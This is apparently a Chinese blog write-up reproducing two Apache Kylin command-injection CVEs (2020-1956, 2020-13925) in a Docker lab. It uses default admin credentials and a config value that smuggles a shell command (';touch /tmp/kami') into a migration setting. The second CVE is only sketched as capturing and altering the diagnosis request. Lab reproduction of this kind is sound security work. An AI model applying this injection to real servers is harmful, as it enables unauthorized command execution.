0x06Cve-2020-1956、Cve-2020-13925复现

Cve-2020-1956、Cve-2020-13925复现

参考:https://paper.seebug.org/1237/

http://www.ijiandao.com/2b/baijia/373874.html

这两个都是Kylin下的漏洞,放在一起复现了

环境:Kylin 官网文档 http://kylin.apache.org/cn/docs/install/kylin_docker.html

0x1 docker里下环境

image-20201109181510327

0x2 运行docker
1
2
3
4
5
6
7
8
9
docker run -d \
-m 8G \
-p 7070:7070 \
-p 8088:8088 \
-p 50070:50070 \
-p 8032:8032 \
-p 8042:8042 \
-p 16010:16010 \
apachekylin/apache-kylin-standalone:3.0.1

注意:login的页面要等一会儿才能出来(一开始一直没有页面还以为是哪里有问题查了一会儿…..

0x3 使用默认密码 admin/KYLIN 登录

image-20201021111136838

image-20201021111207181

0x01 Cve-2020-1956:

0x001 修改配置:

1
2
3
4
kylin.tool.auuto-migrate-cube.enabled=true
kylin.tool.auto-migrate-cube.src-config=/home/admin/apache-kylin-3.0.1-bin-hbase1x/conf/kylin.propertie
kylin.server.cluster-name=kylin_metadata
kylin.tool.auto-migrate-cube.dest-config=/tmp/kylin.properties kylin_streaming_cube learn_kylin true true true true;touch /tmp/kami;echo

image-20201021142624221

0x002 发包,可以看到返回200

image-20201021114530646

0x003 进入查看(docker exec -it bash),可以看到我们写进配置的语句被执行了,生成文件成功

image-20201021114830282

0x02 Cve-2020-13925:

0x001 选择一个项目,点击diagnosis,抓包

image-20201021143637495

image-20201021143717266

0x002 改包,即可

image-20201021150700075

这里有一个额外的知识:burp的collaborator模块